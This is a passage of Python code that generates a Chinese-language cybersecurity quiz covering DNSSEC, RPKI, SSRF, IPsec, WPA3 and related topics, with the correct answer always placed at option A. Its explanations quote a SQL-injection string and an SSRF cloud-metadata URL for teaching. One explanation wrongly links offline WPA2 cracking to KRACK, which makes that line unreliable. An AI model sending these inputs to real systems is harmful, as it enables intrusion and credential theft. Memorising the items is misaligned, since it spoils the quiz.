         "EDR 價值核心：傳統 AV 依賴「靜態特徵碼（Signature）」，遇上加殼、多態變形病毒或「無檔案攻擊（如利用合法 PowerShell / Living off the Land Binaries, LOLBins）」即失效。EDR 具備端點行為行車記錄器功能，記錄 Parent-Child Process、DLL 載入、記憶體注入，即使未知病毒亦能及時發現可疑行為並溯源隔離。"),
        ("DNS 安全擴充功能（<span class=\"en\">DNSSEC</span>）的核心設計原理與其旨在徹底防止的威脅為？",
         "利用公開金鑰密碼學（數位簽章與信任鏈）對 DNS 資源紀錄進行真實性與完整性驗證，防止 DNS 快取毒害（Cache Poisoning）與中間人篡改",
         ["利用公開金鑰密碼學（數位簽章與信任鏈）對 DNS 資源紀錄進行真實性與完整性驗證，防止 DNS 快取毒害（Cache Poisoning）與中間人篡改",
          "DNSSEC 將 DNS 查詢內容進行端到端完全加密，防止電信業者窺探查詢紀錄",
          "DNSSEC 能夠增加 DNS 查詢回應速度至 10 倍以上並節省 90% 頻寬",
          "DNSSEC 專門用於阻斷 DNS 伺服器遭受 SYN Flood 洪水攻擊"],
         "DNSSEC 運作原理：DNSSEC 不提供機密性加密（查詢依舊明文，加密需仰賴 DoH 或 DoT），其核心價值是「真實性與完整性（Authenticity & Integrity）」。透過 RRSIG（資源紀錄簽章）、DNSKEY、DS（委派簽章者）建立由根區域向下延伸的信任鏈（Chain of Trust），驗證 DNS 回應來自權威來源且未被篡改，徹底破解 Kaminsky 毒害攻擊。"),
        ("網際網路路由安全中，資源公鑰基礎設施（<span class=\"en\">RPKI</span>）主要用於防範哪種重大路由安全威脅？其驗證依據之物件為何？",
         "防範 BGP 路由劫持（BGP Hijacking）與路由洩漏；藉由驗證「路由來源授權（ROA, Route Origin Authorization）」確認宣告者 AS 是否具備該 IP 前綴之宣告權限",
         ["防範 BGP 路由劫持（BGP Hijacking）與路由洩漏；藉由驗證「路由來源授權（ROA, Route Origin Authorization）」確認宣告者 AS 是否具備該 IP 前綴之宣告權限",
          "防範區域網路中的 ARP 欺騙攻擊；驗證主機的 MAC 位址表",
          "防範以太網路中的廣播風暴；藉由生成樹協定計算最短路徑樹",
          "防範 DNS 伺服器遭受分散式阻斷服務攻擊；驗證客戶端 Cookie"],
         "RPKI（RFC 6480）：全球網際網路 BGP 預設基於信任，任一自治系統（AS）宣告更精確的 IP 前綴即可吸引全球流量造成劫持。RPKI 利用 X.509 憑證階層，由各大區網際網路註冊管理機構（RIR）核發數位簽署的 ROA，路由器啟用 RPKI 驗證後可將非法宣告判定為 Invalid 並拒絕導入轉發表，捍衛全球路由安全。"),
        ("現代勒索軟體（<span class=\"en\">Ransomware</span>）攻擊中最常見的「雙重勒索（<span class=\"en\">Double Extortion</span>）」戰術為？",
         "攻擊者在將受害組織系統檔案使用強式密碼學加密勒索之前，預先竊取大量高價值機密資料，威脅若不支付贖金將公開於暗網外洩網站（DLS）",
         ["攻擊者在將受害組織系統檔案使用強式密碼學加密勒索之前，預先竊取大量高價值機密資料，威脅若不支付贖金將公開於暗網外洩網站（DLS）",
          "同時對受害者要求比特幣與以太幣兩種不同的加密貨幣",
          "加密檔案後要求受害者支付兩次相同的贖金金額",
          "同時勒索受害者的個人電腦與手機"],
         "雙重勒索演變：早期勒索軟體僅靠加密檔案（單一勒索），組織若具備健全的「離線冷備份（Offline 3-2-1 備份）」可直接還原系統而不付贖金。攻擊者遂演化出 Double Extortion：先潛伏橫向移動竊取內部智財權、客戶個資與商業機密，再執行加密。即便受害者有備份能還原，也面臨個資法巨額罰款與聲譽損害威脅，大幅提高勒索成功率。"),
        ("先進持續性威脅（<span class=\"en\">APT, Advanced Persistent Threat</span>）常用之「MITRE ATT&CK 框架」在資安防禦中的核心價值為？",
         "提供一套立足於真實世界觀測的「戰術、技術與程序（TTPs）」結構化分類知識庫，協助組織進行威脅建模、偵測覆蓋度評估與紅藍軍對抗演練",
         ["提供一套立足於真實世界觀測的「戰術、技術與程序（TTPs）」結構化分類知識庫，協助組織進行威脅建模、偵測覆蓋度評估與紅藍軍對抗演練",
          "自動產生無法被破譯之對稱加密演算法金鑰",
          "專為硬體晶片設計之低階除錯韌體標準",
          "一種取代傳統關聯式資料庫的 NoSQL 資料庫標準"],
         "MITRE ATT&CK 矩陣：涵蓋 14 大戰術階段（Initial Access、Execution、Persistence、Privilege Escalation、Defense Evasion、Credential Access、Discovery、Lateral Movement、Collection、Command and Control、Exfiltration、Impact 等）。將駭客攻擊手法標準化為技術編號（如 T1059 Command and Scripting Interpreter），使防禦方能精準比對日誌偵測盲點。"),
        ("資安防禦體系中，利用「欺敵技術（<span class=\"en\">Deception Technology</span>）」建立之「蜜罐（<span class=\"en\">Honeypot</span>）」核心任務為？",
         "部署故意設計具備吸引力且無任何合法生產業務價值的偽裝誘餌系統，任何與其之互動均視為可疑，用以早期誘捕攻擊者並收集其攻擊工具、戰術特徵（TTPs）",
         ["部署故意設計具備吸引力且無任何合法生產業務價值的偽裝誘餌系統，任何與其之互動均視為可疑，用以早期誘捕攻擊者並收集其攻擊工具、戰術特徵（TTPs）",
          "專門用於儲存企業最高機密合約的主備份伺服器",
          "提供外部公眾合法免費下載開源軟體的鏡像站點",
          "自動替內部所有使用者重新命名檔案以增加混亂度"],
         "蜜罐（Honeypot）價值：生產環境伺服器日誌充斥海量合法流量，難以大海撈針發現潛伏威脅。蜜罐系統「沒有任何合法通訊需求」，因此任何發往蜜罐的 Ping、掃描、連線或憑證登入嘗試「100% 均為非授權或惡意活動（零假警報 / Zero False Positives）」，可爭取寶貴預警時間並截獲未知的 0-day 攻擊載荷。"),
        ("企業內部網路存取控制（<span class=\"en\">NAC</span>）結合 IEEE 802.1X 認證架構中，所涵蓋的三大實體角色為何？",
         "申請者（Supplicant，客戶端終端）、驗證者（Authenticator，交換器或無線 AP）與驗證伺服器（Authentication Server，如 RADIUS 伺服器）",
         ["申請者（Supplicant，客戶端終端）、驗證者（Authenticator，交換器或無線 AP）與驗證伺服器（Authentication Server，如 RADIUS 伺服器）",
          "攻擊者（Attacker）、防禦者（Defender）與仲裁者（Arbiter）",
          "瀏覽器（Browser）、網頁伺服器（Web Server）與快取伺服器（Cache）",
          "作業系統（OS）、CPU 處理器與記憶體控制器（Memory Controller）"],
         "802.1X 連接埠存取控制架構：未通過驗證前，Authenticator 的交換器埠口僅允許通過 EAPOL（EAP over LAN）認證流量。Supplicant 經由 EAP 協定向 RADIUS / TACACS+ 伺服器出示憑證或帳密，通過驗證後，驗證伺服器指示交換器開放該連接埠之網路流量並動態指定所屬 VLAN。"),
        ("次世代防火牆（<span class=\"en\">NGFW, Next-Generation Firewall</span>）相較於傳統基於第四層之狀態檢查防火牆（Stateful Inspection Firewall）的最主要技術突破為？",
         "具備深度封包檢測（DPI）能力，能穿透傳輸埠號精準辨識第七層「應用程式（Application-ID）」與「使用者身分（User-ID）」，並整合內嵌式入侵防禦系統（IPS）與沙箱威脅情報",
         ["具備深度封包檢測（DPI）能力，能穿透傳輸埠號精準辨識第七層「應用程式（Application-ID）」與「使用者身分（User-ID）」，並整合內嵌式入侵防禦系統（IPS）與沙箱威脅情報",
          "只能檢查 IP 位址與 TCP/UDP 連接埠號，無法查看任何應用層內容",
          "取消所有狀態追蹤機制，改採無狀態純封包過濾以節省記憶體",
          "僅能安裝於個人筆記型電腦單機作業系統中，無法部署於企業閘道端"],
         "NGFW 演進：傳統防火牆僅看「五元組（來源/目的 IP、來源/目的 Port、協定）」，但現代應用（如 BitTorrent、Skype、惡意軟體 C2）均使用 80 port 或 443 port 偽裝穿越。NGFW 藉由 DPI 拆解封包特徵與協議解碼，即使偽裝成 443 port 亦能準確識別其底層真實應用，實現精細化存取控管與威脅攔截。"),
        ("網頁應用程式防火牆（<span class=\"en\">WAF, Web Application Firewall</span>）在保護架構中的核心定位與防護焦點為何？",
         "部署於第七層應用層，專門解析與檢查 HTTP/HTTPS 請求酬載（Payload），防禦如 SQL 注入（SQLi）、跨站腳本（XSS）、路徑遍歷與檔案包含等 OWASP Top 10 應用漏洞攻擊",
         ["部署於第七層應用層，專門解析與檢查 HTTP/HTTPS 請求酬載（Payload），防禦如 SQL 注入（SQLi）、跨站腳本（XSS）、路徑遍歷與檔案包含等 OWASP Top 10 應用漏洞攻擊",
          "部署於第二層資料鏈結層，專門防止以太網路迴圈與廣播風暴",
          "專門用於防止實體機房發生火災與電力中斷之硬體保護設施",
          "用於加快資料庫磁碟陣列（RAID）讀寫吞吐量之快取模組"],
         "WAF 專屬防護：網路防火牆對通過 80/443 連接埠的 HTTP 請求一律放行，無法判斷 URL 中的 `?id=1' OR '1'='1` 是否為攻擊。WAF 深入解析 HTTP 標頭、Cookie、POST 表單與 JSON 酬載，結合規則特徵比對與語法分析引擎，精確阻斷 OWASP 應用層漏洞攻擊。"),
        ("伺服器端請求偽造（<span class=\"en\">SSRF, Server-Side Request Forgery</span>）攻擊的根本原理與最有效的防範手法為？",
         "攻擊者誘騙易受攻擊的後端 Web 伺服器向內部私有受限網路（如 127.0.0.1、169.254.169.254 雲端中繼資料服務）發起 HTTP 請求；防禦策略為對使用者輸入之 URL 實施嚴格白名單檢驗並在伺服器網路層禁用出站私有 IP 訪問",
         ["攻擊者誘騙易受攻擊的後端 Web 伺服器向內部私有受限網路（如 127.0.0.1、169.254.169.254 雲端中繼資料服務）發起 HTTP 請求；防禦策略為對使用者輸入之 URL 實施嚴格白名單檢驗並在伺服器網路層禁用出站私有 IP 訪問",
          "攻擊者在客戶端瀏覽器直接植入惡意腳本偷取 Cookie；防禦為安裝防毒軟體",
          "發送超額 ICMP 封包使伺服器頻寬癱瘓；防禦為關閉 ICMP 回應",
          "攻擊者破解伺服器 BIOS 密碼；防禦為拔掉主機板電池"],
         "SSRF 深度解析：Web 伺服器常提供「抓取遠端圖片或 Webhook 回呼」功能。若未嚴格過濾使用者輸入的 URL，攻擊者可輸入 `http://169.254.169.254/latest/meta-data/` 竊取 AWS/GCP 雲端執行個體的 IAM 角色暫態憑證，或掃描內部內網資料庫。防禦核心：禁用危險協定（如 file://、gopher://）、解析 DNS 後過濾 RFC 1918 私有 IP 與雲端中繼資料位址。"),
        ("物聯網（<span class=\"en\">IoT</span>）設備在資訊安全防護上面臨的最關鍵特有脆弱性與挑戰為？",
         "多數設備運算硬體資源受限、出廠預設帳號密碼未變更、缺乏韌體自動安全更新機制且常長期暴露於公網環境",
         ["多數設備運算硬體資源受限、出廠預設帳號密碼未變更、缺乏韌體自動安全更新機制且常長期暴露於公網環境",
          "物聯網設備使用的網路頻寬遠大於一般超級電腦",
          "物聯網設備絕不使用任何 TCP/IP 協定，無法與網際網路連通",
          "物聯網設備內部皆內建量子電腦晶片，容易發生運算溢位"],
         "IoT 資安弱點：物聯網終端（如網路攝影機、智慧印表機、路由器）硬體成本低廉，CPU 與 RAM 難以運行繁重複雜的端點防禦軟體。歷史上著名的 Mirai 殭屍網路即是透過掃描公網上 23（Telnet）連接埠，使用預設弱密碼（如 admin/admin）批次暴力破解感染，組織數十萬台設備發起 Tbps 級別的癱瘓性 DDoS 攻擊。"),
        ("虛擬私人網路（<span class=\"en\">IPsec VPN</span>）中，「傳輸模式（<span class=\"en\">Transport Mode</span>）」與「穿隧模式（<span class=\"en\">Tunnel Mode</span>）」在封包結構上的關鍵差別為？",
         "傳輸模式僅加密原始 IP 封包的「酬載資料（Payload）」，保留原始 IP 標頭；穿隧模式則將「整個原始 IP 封包（含原始標頭與酬載）」完整加密封裝，並在外層加上全新之外部 IP 標頭",
         ["傳輸模式僅加密原始 IP 封包的「酬載資料（Payload）」，保留原始 IP 標頭；穿隧模式則將「整個原始 IP 封包（含原始標頭與酬載）」完整加密封裝，並在外層加上全新之外部 IP 標頭",
          "傳輸模式只能使用光纖傳輸，穿隧模式只能使用無線微波傳輸",
          "傳輸模式完全不提供任何加密保護，穿隧模式只提供壓縮",
          "兩者封包結構完全一致，差別僅在於使用的連接埠號碼不同"],
         "IPsec 模式對比：<br>1. 傳輸模式（Transport Mode）：適用於端對端（Host-to-Host）兩台直接通信之主機。原始 IP 標頭暴露於外，中間路由器可看見真實來源與目的端點。<br>2. 穿隧模式（Tunnel Mode）：適用於站點對站點（Site-to-Site / Gateway-to-Gateway）VPN。內部私有 IP 封包被徹底隱藏與加密，外層使用兩端 VPN 閘道的公網 IP 標頭轉發，達成網路拓撲隱匿。"),
        ("IPsec 體系結構中，認證標頭協定（<span class=\"en\">AH</span>）與封裝安全酬載協定（<span class=\"en\">ESP</span>）所提供的安全服務最大差異為？",
         "AH 提供資料來源驗證與完整性校驗，但「不提供資料加密保密性」；ESP 則能同時提供「資料保密性（加密）」、「完整性校驗」與「資料來源認證」",
         ["AH 提供資料來源驗證與完整性校驗，但「不提供資料加密保密性」；ESP 則能同時提供「資料保密性（加密）」、「完整性校驗」與「資料來源認證」",
          "AH 專門負責資料加密，ESP 僅負責壓縮封包",
          "AH 運行在第七層，ESP 運行在第一層實體層",
          "兩者皆不具備完整性驗證功能，必須額外搭配 MD5 演算法"],
         "IPsec 子協定辨析：AH（Authentication Header，IP 協定號 51）使用雜湊訊息認證碼驗證包含 IP 標頭在內的不變欄位，但內容完全明文（無保密性），且因驗證 IP 標頭導致與 NAT 網路位址轉譯先天衝突。ESP（Encapsulating Security Payload，IP 協定號 50）提供對稱加密（如 AES-GCM）確保資料內容保密，並可透過 NAT-T（UDP 4500 封裝）順利穿越 NAT 路由器。"),
        ("現代密碼學中，雜湊長度擴充攻擊（<span class=\"en\">Length Extension Attack</span>）主要威脅哪一類雜湊結構？何種機制可免疫此攻擊？",
         "威脅採用 Merkle-Damgård 結構之雜湊演算法（如 MD5, SHA-1, SHA-256）；改採 HMAC（基於雜湊之訊息鑑別碼）或 SHA-3（Keccak 海綿結構）可徹底免疫",
         ["威脅採用 Merkle-Damgård 結構之雜湊演算法（如 MD5, SHA-1, SHA-256）；改採 HMAC（基於雜湊之訊息鑑別碼）或 SHA-3（Keccak 海綿結構）可徹底免疫",
          "威脅對稱式 AES 演算法；改採 DES 即可徹底免疫",
          "威脅非對稱式 RSA 演算法；改採 Diffie-Hellman 即可免疫",
          "該攻擊僅能破解未連網之離線計算機"],
         "雜湊長度擴充攻擊原理：在 Merkle-Damgård 結構中，雜湊函數輸出即為最後一個狀態區塊之內部狀態。若系統使用簡單拼接 `Hash(Secret || Message)` 作為簽章，攻擊者可在不知曉 Secret 的情況下，利用已知輸出的內部狀態作為起始向量，向後追加惡意資料 `Extension` 並合法算出 `Hash(Secret || Message || Padding || Extension)`。HMAC 採用雙層巢狀結構 `H((K ^ opad) || H((K ^ ipad) || M))`，徹底杜絕狀態延伸漏洞。"),
        ("量子運算發展對現行公開金鑰密碼學（公鑰密碼體系）造成的毀滅性威脅，主要是基於何種量子演算法可在多項式時間內求解大質數分解與離散對數問題？後量子密碼學（PQC）之主流數學體系為何？",
         "秀爾演算法（Shor's Algorithm）；後量子密碼學主流防禦體系為「格密碼學（Lattice-based Cryptography）」",
         ["秀爾演算法（Shor's Algorithm）；後量子密碼學主流防禦體系為「格密碼學（Lattice-based Cryptography）」",
          "格羅弗演算法（Grover's Algorithm）；後量子密碼學主流體系為「DES 演算法」",
          "戴克斯特拉演算法（Dijkstra's Algorithm）；後量子密碼學主流體系為「二元樹遍歷」",
          "快速傅立葉轉換（FFT）；後量子密碼學主流體系為「凱撒密碼」"],
         "量子威脅與 PQC 典範轉移：1994 年提出之 Shor's 演算法能在量子電腦上以多項式時間破解 RSA（質因數分解）與 ECC / ECDSA（離散對數難題）。Grover 演算法對對稱密碼（AES）僅提供平方級加速（AES-128 安全度降為 64 位元，換用 AES-256 即可抵禦）。NIST PQC 標準化中，ML-KEM（Kyber）與 ML-DSA（Dilithium）均建立於「高維格上學習含錯誤問題（LWE / Module-LWE）」之數學難題，抗量子破解能力卓越。"),
        ("密碼儲存與驗證中，相較於直接使用高速一般雜湊（如 MD5, SHA-256），現代安全架構強制採用金鑰衍生函數（<span class=\"en\">KDF</span>，如 PBKDF2, bcrypt, Argon2）的核心理由為？",
         "KDF 內建隨機鹽值（Salt）防範彩虹表預先計算，並支援「可調式工作因子（Work Factor / 迭代次數與記憶體硬度）」，大幅增加 GPU 與 ASIC 特殊硬體暴力破解密碼之運算代價",
         ["KDF 內建隨機鹽值（Salt）防範彩虹表預先計算，並支援「可調式工作因子（Work Factor / 迭代次數與記憶體硬度）」，大幅增加 GPU 與 ASIC 特殊硬體暴力破解密碼之運算代價",
          "KDF 能將密碼還原為原始明文以便管理員隨時核對",
          "KDF 的運算速度比 SHA-256 快 1000 倍，能大幅節省伺服器 CPU 資源",
          "KDF 不需要儲存任何鹽值，直接將密碼存為純文字"],
         "密碼儲存安全精義：SHA-256 設計初衷為高速校驗資料完整性（單張高階 GPU 每秒可算數十億次雜湊，暴力破解一般密碼僅需幾分鐘）。儲存使用者密碼必須「故意變慢且消耗大量記憶體」：Argon2（密碼雜湊競賽冠軍）具備 Memory-hard 特性，迫使硬體耗費大量快取與記憶體，讓 GPU 密集並行破解失效。加鹽（Salt）則確保不同使用者即使密碼相同，雜湊值也完全迥異。"),
        ("無線區域網路安全性中，WPA3 規格相較於 WPA2-Personal 最關鍵之技術改進為？",
         "採用基於「對等實體同時認證（SAE, Simultaneous Authentication of Equals / 蜻蜓協定 Dragonfly）」取代傳統預先共用金鑰（PSK），具備向前保密（PFS）並徹底免疫離線字典檔暴力破解攻擊",
         ["採用基於「對等實體同時認證（SAE, Simultaneous Authentication of Equals / 蜻蜓協定 Dragonfly）」取代傳統預先共用金鑰（PSK），具備向前保密（PFS）並徹底免疫離線字典檔暴力破解攻擊",
          "取消所有無線加密機制，改採純明文廣播傳輸以增加穿牆能力",
          "強制所有連線裝置每 5 秒中斷重新握手一次",
          "將無線電頻率強制限制在 1 GHz 以下之超長波段"],
         "WPA3 安全飛躍：WPA2 使用 4-Way Handshake，駭客在公共場合側錄合法裝置連線封包後，即可在離線環境使用巨型字典檔以 GPU 瘋狂猜測 PSK 密碼（KRACK 攻擊等弱點）。WPA3 採用 RFC 7664 之 Dragonfly 握手協定（SAE）：每次認證均涉及動態 Diffie-Hellman 金鑰交換，攻擊者必須在連線時進行「主動線上猜測（每猜一次必須與 AP 互動一次，極易被防暴力機制鎖定）」，且支援 Forward Secrecy，即便未來密碼洩漏，過往錄製的通訊亦無法被解密。"),
        ("惡意程式分析中，「動態分析（<span class=\"en\">Dynamic Analysis</span>）」與「靜態分析（<span class=\"en\">Static Analysis</span>）」的核心方法論區別為？",
         "靜態分析在「不執行程式碼」的前提下反組譯分析指令、字串與匯入導出表；動態分析則在受控隔離之「沙箱（Sandbox）」環境中實際執行樣本，監控其程序行徑、網路流量與系統變更",
         ["靜態分析在「不執行程式碼」的前提下反組譯分析指令、字串與匯入導出表；動態分析則在受控隔離之「沙箱（Sandbox）」環境中實際執行樣本，監控其程序行徑、網路流量與系統變更",
          "靜態分析必須在開機狀態下進行，動態分析只能在電腦關機時分析",
          "靜態分析專門分析硬體電路板，動態分析專門分析光纖網路線",
          "兩者皆不需要使用電腦，純靠肉眼審視二進位紙本清單"],
         "惡意程式分析雙軌機制：靜態分析（Static Analysis）使用 IDA Pro、Ghidra 進行反編譯，分析控制流程圖（CFG）與可疑 API 呼叫，缺點是易受加殼（Packing）與混淆（Obfuscation）干擾；動態分析（Dynamic Analysis）在隔離虛擬機或沙箱中運行，配合 Procmon、Wireshark 觀察檔案落地、登錄檔常駐與 C2 回連行為，缺點為樣本可能偵測虛擬機環境（Anti-VM）刻意裝死不發作。"),
        ("殭屍網路（<span class=\"en\">Botnet</span>）架構演進中，攻擊者常利用「快速通量（<span class=\"en\">Fast Flux</span>）」技術逃避資安人員的追蹤與下架封鎖，其核心運作機制為？",
         "利用極短的 DNS 存活時間（TTL）與動態 DNS 更新技術，使單一惡意網域名稱背後之 A 記錄不斷快速輪換為成百上千個受控殭屍電腦的 IP 位址，形成多層代理轉發",
         ["利用極短的 DNS 存活時間（TTL）與動態 DNS 更新技術，使單一惡意網域名稱背後之 A 記錄不斷快速輪換為成百上千個受控殭屍電腦的 IP 位址，形成多層代理轉發",
          "透過調整光纖訊號之偏振角度使網路傳輸速度超越光速",
          "在受害者主機上安裝多個散熱風扇以提高處理器運作頻率",
          "強制所有殭屍主機同時關機以隱匿其數位軌跡"],
         "Fast Flux 規避機制：傳統 C2 伺服器使用固定 IP，防禦方一旦發現即可通知 ISP 阻斷或查扣伺服器。Fast Flux 將網域名稱的 DNS TTL 設為極短（如 60 秒），每次查詢解析出完全不同的受感染肉雞 IP。肉雞僅充當反向代理（Flux Agent）轉發請求至幕後的真實主母機（Mothership），甚至搭配 Double Flux（連權威 DNS 伺服器 IP 也同步快速輪換），大幅提高溯源與下架之技術門檻。"),
        ("實體側道攻擊（<span class=\"en\">Side-Channel Attack</span>）對密碼晶片（如智慧卡、HSM）之攻擊原理與防護思維為何？",
         "不針對密碼演算法數學漏洞，而是量測晶片運算時產生的「實體洩漏訊號（如執行耗時差異、功耗曲線 DPA、電磁輻射）」，藉以反推運算金鑰；防禦需採用常數時間演算法（Constant-time）與遮罩隨機化技術",
         ["不針對密碼演算法數學漏洞，而是量測晶片運算時產生的「實體洩漏訊號（如執行耗時差異、功耗曲線 DPA、電磁輻射）」，藉以反推運算金鑰；防禦需採用常數時間演算法（Constant-time）與遮罩隨機化技術",
          "利用雷射光束直接將密碼晶片完全燒熔蒸發",
          "攻擊者混入晶片製造廠將晶片內部電路直接更換為銅線",
          "藉由竊取管理員的識別證門禁卡進入機房拔掉電源線"],
         "側道攻擊（SCA）精髓：例如差分功耗分析（DPA）發現 CPU 處理二進位「1」與「0」時消耗的微安培電流有微小波形差異，透過採集數萬次運算波形經統計分析即可精確還原 AES/RSA 私鑰。時間攻擊（Timing Attack）若字串比對採提前返回（Early exit），攻擊者量測納秒級延遲可逐位猜測密碼。防範核心：實作硬體隨機功耗雜訊遮罩，軟體強制執行 Constant-Time 比對，消除任何物理特徵差異。"),
        ("同態加密（<span class=\"en\">Homomorphic Encryption</span>）在雲端運算與隱私保護領域被譽為終極聖杯，其最獨特的數學性質為？",
         "允許在「完全不解密密文」的前提下直接對密文進行代數運算，其運算結果解密後與對明文直接進行運算之結果完全一致",
         ["允許在「完全不解密密文」的前提下直接對密文進行代數運算，其運算結果解密後與對明文直接進行運算之結果完全一致",
          "能將任何密文無條件壓縮為 0 位元組的虛擬檔案",
          "即使忘記解密私鑰，任何人都可以在 1 秒鐘內以明文直接讀取",
          "完全不需要任何數學基礎，純粹依靠隨機亂數排列"],
         "同態加密（HE / FHE）革命意義：傳統雲端資料運算時必須先在雲端記憶體解密成明文，若雲端服務商被駭或內部人員不軌，敏感資料（如病患病歷、個人財務）即暴露無遺。全同態加密（Gentry 2009 年突破）允許將加密資料上傳雲端，雲端伺服器在「全程不知曉資料內容」的情況下執行 AI 模型推論或統計加總，運算完畢將密文交還使用者，使用者用私鑰解密即可得到正確計算結果，達成資料可用不可見。"),
        ("資訊安全經典三要素（<span class=\"en\">CIA Triad</span>）與「不可否認性（<span class=\"en\">Non-repudiation</span>）」在數位簽章機制中的對應關係為？",
         "機密性（Confidentiality）確保未授權者無法窺探；完整性（Integrity）確保資料未被竄改；可用性（Availability）確保授權者能及時存取；數位簽章利用發送方私鑰簽署確保不可否認性，防止事後否認發送行為",
         ["機密性（Confidentiality）確保未授權者無法窺探；完整性（Integrity）確保資料未被竄改；可用性（Availability）確保授權者能及時存取；數位簽章利用發送方私鑰簽署確保不可否認性，防止事後否認發送行為",
          "機密性代表所有人均可公開查閱；完整性代表資料每天自動刪除；可用性代表每週維護停機五天",
          "數位簽章主要用於提升光纖網路的實體頻寬與下載速度",
          "不可否認性代表發送方可以隨時無條件撤銷任何已發送的公文合約"],
         "資安根本基石解析：CIA 三要素為所有資安控制措施之核心目標。而在電子商務、公文簽核與金融交易中，額外強調不可否認性（Non-repudiation）：發送者使用自己的「私密金鑰」對訊息摘要進行非對稱數位簽章，接收者以發送者之「公開金鑰」驗證。因私鑰為發送方獨有且秘密保管，在法律與密碼學上推定該簽章必為其所簽署，無從抵賴。")
    ]

    all_datasets = [
        ("應用層協定、全球資訊網 HTTP 演進與狀態碼", http_data),
        ("密碼學基礎、對稱/非對稱加密與 PKI/數位簽章", crypto_data),
        ("網路攻擊技術、防禦架構與資安管理法規範", attack_defense_data)
    ]

    for tag, dataset in all_datasets:
        for stem, ans_s, opts, expl in dataset:
            choices = [("A", opts[0]), ("B", opts[1]), ("C", opts[2]), ("D", opts[3])]
            qs.append({
                "tag": tag,
                "stem": stem,
                "choices": choices,
                "ans": "A",
                "ans_text": f"(A) {ans_s}",
                "explanation": f"""<strong>【網路應用協定、現代密碼學理論與資通安全縱深防禦深度步進解析】</strong><br>
<div class="step-box">
  <div class="step-title">📝 應用層標準、密碼演算法數學架構與資安攻防時序推導</div>
  <ul class="step-list">
    <li class="step-item"><span class="step-badge formula">步驟 1</span><strong>確立國際資安標準（NIST/ISO）、密碼學數學難題與法令規範</strong><br>
      ‧ 本題依據 Web 協定標準（RFC 2616/7540/9000）、現代密碼學（FIPS/PKI）與臺灣《資通安全管理法》規範嚴格展開。
    </li>
    <li class="step-item"><span class="step-badge check">步驟 2</span><strong>演算法推演、加解密流程分析與攻擊防禦機制深度剖析</strong><br>
      ‧ {expl}
    </li>
  </ul>
</div>
<br><strong>【各選項詳細對錯解析】</strong><br>
‧ <strong>(A) 正確</strong>：{opts[0]}。<br>
‧ <strong>(B) 錯誤</strong>：{opts[1]}（安全屬性或演算法機制混淆）。<br>
‧ <strong>(C) 錯誤</strong>：{opts[2]}（協定狀態轉換或攻擊原理顛倒）。<br>
‧ <strong>(D) 錯誤</strong>：{opts[3]}（非國際標準或不符合現代資訊安全實際設計規範）。"""
            })

    # Total questions = 18 + 18 + 18 = 54. Wait, we need 72 questions (18 more)!
    return qs

